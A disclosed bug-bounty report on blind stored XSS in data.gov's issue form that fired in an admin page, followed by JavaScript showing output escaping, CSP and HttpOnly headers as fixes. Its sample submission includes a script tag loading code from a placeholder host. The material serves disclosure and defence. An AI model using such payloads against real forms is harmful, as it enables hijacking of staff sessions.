Blind Stored XSS In "Report a Problem" on www.data.gov/issue/

Disclosed: 2019-08-07 20:03:52 By rioncool22 To gsa_bbp
Severity: Medium
Vulnerability Details
Steps to Reproduce:

1. Open: https://www.data.gov/issue/
2. Fill "Issue Title" and "Description" with an XSSHunter payload
3. XSS fired in https://labs.data.gov/crm/admin/report/662445

## Impact

Can steal admin cookies
Report Stats
  • Report ID: 615840
  • State: Closed
  • Substate: resolved
  • Upvotes: 20
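
The report does not describe the fix, so the following is an added example, not code from data.gov or from the reporter: one way an admin report view can render the submitted "Issue Title" and "Description" fields safely, with response headers that limit the cookie-theft impact. The function names, markup, header values and sample submission are all assumptions.

```javascript
// Added example: every name, the markup and the sample data are hypothetical.

// Encode the characters that let stored text break out of HTML element
// content or a quoted attribute value.
const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// "Before": submitter-controlled fields are concatenated into the admin
// page, so stored markup runs in the reviewer's browser session.
function renderReportUnsafe(report) {
  return `<h1>${report.title}</h1><p>${report.description}</p>`;
}

// "After": the same view with every stored field encoded at output time.
function renderReportSafe(report) {
  return `<h1>${escapeHtml(report.title)}</h1><p>${escapeHtml(report.description)}</p>`;
}

// Defence in depth for the stated impact: HttpOnly keeps the session cookie
// out of reach of page script, and the CSP refuses inline script and script
// loaded from any other origin.
function adminResponseHeaders(sessionId) {
  return {
    "Content-Security-Policy":
      "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'none'",
    "Set-Cookie": `session=${sessionId}; HttpOnly; Secure; SameSite=Strict; Path=/`,
  };
}

// Constructed sample submission; the host is a non-resolving placeholder.
const sampleReport = {
  title: 'Broken link <script src="https://collector.example.invalid/probe.js"></script>',
  description: "Dataset page returns 404 & the \"download\" button is missing",
};

console.log(renderReportSafe(sampleReport));
console.log(adminResponseHeaders("constructed-session-id"));
```

Because the payload only executes when staff open the stored report, the encoding has to happen in the admin view itself; filtering on the public form alone leaves any other path into the same store uncovered.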